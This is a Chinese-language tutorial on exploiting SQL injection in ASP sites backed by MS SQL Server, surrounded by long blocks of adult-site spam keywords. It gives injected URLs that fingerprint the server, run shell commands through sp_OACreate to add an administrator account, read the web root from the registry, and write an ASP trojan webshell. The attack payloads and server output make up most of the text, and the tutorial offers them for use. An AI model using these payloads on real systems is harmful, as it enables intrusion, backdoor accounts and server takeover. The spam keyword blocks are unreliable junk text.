成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久

您的位置:首頁技術(shù)文章
文章詳情頁

榨干MS SQL Server 最后一滴血

瀏覽:216日期:2023-10-29 12:37:53

風(fēng)云變換的網(wǎng)絡(luò),網(wǎng)絡(luò)安全讓人們不能不關(guān)注它。數(shù)據(jù)庫(kù),讓我們不得不想起強(qiáng)大的ORACLE,MS SQL。微軟的漏洞最多,今天就用SQL INJECTION來讓MS SQL為我們好好的工作。

以下(使用一知名網(wǎng)站作為測(cè)試點(diǎn)),相信大家對(duì)SQL爆庫(kù),爆表,爆字段都已掌握,在這里就不多說這方面了。

MS SQL內(nèi)置函數(shù)介紹:

@@VERSION 獲得Windows的版本號(hào),MS SQL的版本號(hào),補(bǔ)丁。 User_name() 得到當(dāng)前系統(tǒng)的連接用戶 Db_name() 得到當(dāng)前連接的數(shù)據(jù)庫(kù) HOST_NAME() 得到當(dāng)前主機(jī)的名稱

這些信息有助我們對(duì)系統(tǒng)進(jìn)行簡(jiǎn)單的了解

好,下面我們就開始吧!

語句:

http://www.xxx.com/list.asp?classid=1'

返回信息:

Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 '80040e14' 字符串 ' Order By Id DESC' 之前有未閉合的引號(hào)。 /list.asp,行290;

從這里未閉合的引號(hào)(“’”),我們可以確定存在SQL INJECTION。發(fā)現(xiàn)在漏洞當(dāng)然接著走了,利用以上介紹的函數(shù)為我們工作了:

語句:

http://www.xxx.com/list.asp?classid=1 and 0<>(select @@version)

返回:

Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 '80040e07' 將 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 轉(zhuǎn)換為數(shù)據(jù)類型為 int 的列時(shí)發(fā)生語法錯(cuò)誤。 /list.asp,行290;

相關(guān)的信息出來了,MS SERVER ADVANCED SERVER 2000+SP4, SQL 2000+SP3,從MS SQL SERVER 后面的8.00.760可看出是SP3補(bǔ)丁。看了服務(wù)器的信息,接下應(yīng)該了解數(shù)據(jù)庫(kù)的權(quán)限了:

語句:

http://www.xxx.com/list.asp?classid=1 and user_name()=’dbo’

返回: 正常返回的信息

確定是權(quán)限是DBO,從表面DBO權(quán)限的連接用戶經(jīng)常是涉及SYSADMIN服務(wù)器角色成員。說明數(shù)據(jù)庫(kù)服務(wù)器角色成員組默認(rèn)是在每個(gè)數(shù)據(jù)庫(kù)增加一個(gè)DBO用戶。

返回原理根1=1,1=2相似..這里只是權(quán)限測(cè)試,我們也把它爆出來看看:

語句:

http://www.xxx.com/list.asp?classid=1 and 0<>(select user_name())

返回:

Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 '80040e07' 將 nvarchar 值 'dbo' 轉(zhuǎn)換為數(shù)據(jù)類型為 int 的列時(shí)發(fā)生語法錯(cuò)誤。 /list.asp,行290;

說明連接數(shù)據(jù)庫(kù)的用戶權(quán)限很高,可以確定是服務(wù)器角色組中的成員。

語句:http://www.xxx.com/list.asp?classid=1 and 0<>(select db_name())—返回:Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 '80040e07' 將 nvarchar 值 'GameIMGSys' 轉(zhuǎn)換為數(shù)據(jù)類型為 int 的列時(shí)發(fā)生語法錯(cuò)誤。 /list.asp,行290

這樣就可以爆出當(dāng)前的數(shù)據(jù)庫(kù)。得到這么高權(quán)限的數(shù)據(jù)庫(kù)連接成員,我們當(dāng)然想直接得到WEBSHELL,或是直接拿到NT ADMIN。NT ADMIN取決于當(dāng)前服務(wù)器的配置,如果配置不合理的服務(wù)器,我們要直接拿NT ADMIN,拿NT ADMIN就要用到:

MSSQL內(nèi)置存儲(chǔ)過程:

sp_OACreate (通過它,危害很得更大,但是需要有SYSADMINS權(quán)限才可能使用) sp_OAGetErrorInfo sp_OAGetProperty sp_OAMethod sp_OASetProperty sp_SetPropertysp_OAStop

由于MS SQL一次可以執(zhí)行多語句,使得我們有機(jī)會(huì)使用更多的語句。

語句:

http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:WINNTsystem32cmd.exe /c net user cntest chinatest /add'

正常返回。(提示:如果主機(jī)上shell存在的話那將在服務(wù)器上創(chuàng)建一個(gè)cntest的用戶)

創(chuàng)建用戶了,語句后再加個(gè)net localgroup administrators cntest /add加到管理組中。 如果對(duì)方的機(jī)子開著3389端口,或IPC的話,那接下來的事,就不用我多說了。

遇到專業(yè)型主機(jī),只開一個(gè)80端口,那應(yīng)該怎么辦呢?當(dāng)然,我們還是可能拿到WEBSHELL,再慢慢滲透的。

由于權(quán)限高,我們可能先建表,寫入ASP木馬的數(shù)據(jù)再通過MAKEWEBTASK,得到WEBSEHLL.手工寫入的程序太過于繁鎖,上傳WEBSHELL最大的問題還是網(wǎng)頁目錄,現(xiàn)在網(wǎng)上已經(jīng)有現(xiàn)成的工具通過BACKUP,和MASKWEBTASK的工具得到WEBSHELL了。以下推薦,獲取網(wǎng)頁路徑(通過存儲(chǔ)過程達(dá)到對(duì)注冊(cè)表的讀取):

利用內(nèi)置存儲(chǔ)過程 xp_regread(讀取注冊(cè)表鍵值,權(quán)限public):

語句:

http://www.xxx.com/list.asp?classid=1;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test);

IIS的默認(rèn)路徑的在注冊(cè)表中HKEY_LOCAL_MACHINE SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots

利用爆字段將數(shù)據(jù)庫(kù)的值讀出來:

語句:

http://www.xxx.com/list.asp?classid=1 and 0<>(select top 1 paths from newtable)

返回:

Microsoft OLE DB Provider for ODBC Drivers 錯(cuò)誤 '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]將 varchar 值 'E:www,,201' 轉(zhuǎn)換為數(shù)據(jù)類型為 int 的列時(shí)發(fā)生語法錯(cuò)誤。;

這說明網(wǎng)頁目錄在E:www,接下來也可以利用FSO直接寫入ASP木馬(提示必須擁用SYSADMIN權(quán)限才可使用FSO和FSO開入的前提下) :

語句:

http://www.xxx.com/list.asp?class=1;declare%20@o%20int,%20@f%20int,%20@t%20int,%20@ret%20int%20exec%20sp_oacreate%20'scripting.filesystemobject',%20@o%20out%20exec%20sp_oamethod%20@o,%20'createtextfile',%20@f%20out,%20'e:wwwtest.asp',1%20exec%20@ret%20=%20sp_oamethod%20@f,%20'writeline',%20NULL,%20'On Error Resume Next'

在E:WWW下創(chuàng)建一個(gè)test.asp并寫入On Error Resume next語句:

http://www.xxx.com/list.asp?classid=1;declare%20@o%20int,%20@f%20int,%20@t%20int,%20@ret%20int%20exec%20sp_oacreate%20'scripting.filesystemobject',%20@o%20out%20exec%20sp_oamethod%20@o,%20'opentextfile',%20@f%20out,%20'e:wwwtest.asp',8%20exec%20@ret%20=%20sp_oamethod%20@f,%20'writeline',%20NULL,%20'asp horse '

在E:WWWtest.asp增加一行記錄,記錄為asp horse, 整個(gè)完整木馬可能這樣寫入。(%百分號(hào)要用%25替代寫入)。如果得不到網(wǎng)頁目錄,怎么辦呢?前提你要猜到網(wǎng)站是否使用默認(rèn)WEB,或者使用域名作為WEB。

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,’ cscript.exe c:inetpubwwwrootmkwebdir.vbs -w '默認(rèn) Web 站點(diǎn)' -v 'e','e:'’;

在默認(rèn)的WEB站點(diǎn)下創(chuàng)建一個(gè)虛擬目錄E,指向E:盤下。

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,’ cscript.exe c:inetpubwwwrootchaccess.vbs -a w3svc/1/ROOT/e +browse’

給虛擬目錄e加上瀏覽屬性不錯(cuò)吧。給自己開虛擬服務(wù)。想那些網(wǎng)頁目錄路徑,頭都快破了。這下給自己一個(gè)天開眼了。那傳WEBSHELL利用MS SQL為我們的工作告了一段落了,接下來工作應(yīng)該由你來了。

成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久
久久久久久久久蜜桃| 国产日本亚洲高清| 久久亚区不卡日本| 国模套图日韩精品一区二区 | 亚洲mv在线观看| 亚洲精品国产日韩| 国产欧美精品在线观看| 色综合天天综合在线视频| 欧美不卡视频一区| 国产一区二区免费视频| 在线观看成人免费视频| 日韩影院免费视频| 国产一级精品aaaaa看| 亚洲欧美国产三级| 99riav国产精品| 一区二区三区波多野结衣在线观看 | 久久久久久99精品| 成人av中文字幕| 欧美一卡二卡在线| 国产高清在线精品| 欧美tk丨vk视频| 91网站在线观看视频| 精品国产一区久久| 99精品国产视频| 国产片一区二区三区| 欧美体内she精视频在线观看| 国产欧美一区二区三区网站| 国户精品久久久久久久久久久不卡| 久久久久久免费网| 91亚洲国产成人精品一区二三 | 亚洲va欧美va国产va天堂影院| 亚洲一区二区三区午夜| 亚洲午夜精品久久久久久久久| 国产精品一国产精品k频道56| 一级中文字幕一区二区| 媚黑女一区二区| 久久疯狂做爰流白浆xx| 欧美一级国产精品| 成人国产精品免费观看动漫| 日韩精品在线一区| 午夜久久美女| 18欧美亚洲精品| 国产精品乱码| 日韩高清在线一区| 欧美色倩网站大全免费| 久久成人羞羞网站| 日韩一级免费观看| 91在线国产福利| 中文字幕制服丝袜一区二区三区| 99亚洲一区二区| 青青草伊人久久| 欧美一卡二卡三卡四卡| 欧美激情91| 亚洲色欲色欲www| 蜜乳av另类精品一区二区| 久久99精品国产| 精品第一国产综合精品aⅴ| 国产一区二区三区自拍| 一区二区三区欧美久久| 欧美影院午夜播放| 国产精品18久久久久久久网站| 日韩免费成人网| 国产精品国色综合久久| 亚洲电影欧美电影有声小说| 欧美日韩三级一区二区| av午夜精品一区二区三区| 国产精品久久一级| 久久最新视频| 国产精品2024| 亚洲欧洲在线观看av| 乱人伦精品视频在线观看| 久久er99精品| 久久丝袜美腿综合| 一区二区三区|亚洲午夜| 日韩和欧美一区二区| 911精品国产一区二区在线| 欧美成人中文| 午夜伊人狠狠久久| 日韩亚洲欧美在线| 国产一区二区三区无遮挡| 日韩激情在线观看| 精品日韩在线观看| 亚洲人人精品| 麻豆精品国产91久久久久久| 久久伊人蜜桃av一区二区| 免费看的黄色欧美网站| 国产精品综合一区二区三区| 国产精品天干天干在线综合| 久色成人在线| 91网站黄www| 一区二区三区日韩精品视频| 欧美人妖巨大在线| 国模精品一区二区三区| 日韩精品国产欧美| 久久影院电视剧免费观看| 模特精品在线| 成人激情黄色小说| 亚洲成av人片一区二区| 欧美不卡一区二区| 久久精品中文| 91视频在线观看| 视频一区二区三区在线| 国产欧美一区二区精品忘忧草 | 欧美日一区二区三区在线观看国产免| 三级精品在线观看| 国产欧美日韩一区二区三区在线观看| 色素色在线综合| 欧美午夜免费影院| 国产精品1区2区| 亚洲成av人片一区二区三区| 久久午夜羞羞影院免费观看| 亚洲欧美久久久| 99riav一区二区三区| 天堂一区二区在线免费观看| 中文字幕不卡的av| 欧美日韩国产小视频在线观看| 91久久精品国产91久久性色tv| 国产精品综合视频| 香港成人在线视频| 欧美国产精品专区| 67194成人在线观看| 国产精品入口| 91蜜桃传媒精品久久久一区二区| 日韩电影免费一区| 国产精品久99| 日韩一区二区三区在线视频| 老鸭窝91久久精品色噜噜导演| 91视频在线看| 老司机免费视频一区二区| 自拍偷拍亚洲激情| 日韩免费成人网| 在线观看日韩高清av| 国产精品日本欧美一区二区三区| 欧美日韩一区二区高清| 国产成人av一区二区| 美女一区二区久久| 亚洲成av人片| 亚洲欧美激情在线| 国产女人水真多18毛片18精品视频| 91精品国产91久久久久久最新毛片 | 欧美视频一区二| 一区二区三区导航| 国产精品v欧美精品∨日韩| 国产成人精品亚洲日本在线桃色| 蜜臀av性久久久久蜜臀av麻豆| 亚洲色图丝袜美腿| 国产三级一区二区| 精品少妇一区二区三区免费观看| 在线观看av一区| 久久精品国产第一区二区三区最新章节| 欧美日韩精品综合| 99久久精品国产导航| 国产99久久久久| 国内精品视频一区二区三区八戒| 五月天精品一区二区三区| 亚洲视频在线一区二区| 国产视频不卡一区| 亚洲精品一区二区三区福利| 欧美精品久久久久久久多人混战| 久久久久久穴| 亚洲综合好骚| 国产精品日本| 国产欧美另类| 亚洲成色最大综合在线| 欧美精品99| 欧美激情1区2区| 女女同性女同一区二区三区91| www.av精品| 成人av影院在线| 成人av资源在线| a在线播放不卡| 成人妖精视频yjsp地址| 国产成人自拍网| 国产成人综合亚洲91猫咪| 国产福利电影一区二区三区| 国产精品123| 国产成人精品综合在线观看| 国产成人精品亚洲午夜麻豆| 成人亚洲一区二区一| 国产v综合v亚洲欧| 国产成人8x视频一区二区| 国产精品538一区二区在线| 国产九色精品成人porny| 国产寡妇亲子伦一区二区| 国产精品一二三四| 国产精品主播直播| 粉嫩蜜臀av国产精品网站| 成人一级黄色片| 99久久婷婷国产综合精品电影 | 色欧美日韩亚洲| 欧美亚洲尤物久久| 欧美精品精品一区| 日韩一级片网址| 精品精品国产高清a毛片牛牛| 精品毛片乱码1区2区3区| 国产日本一区二区| 亚洲三级在线播放| 亚洲超碰97人人做人人爱| 青青草伊人久久| 国产成人午夜视频|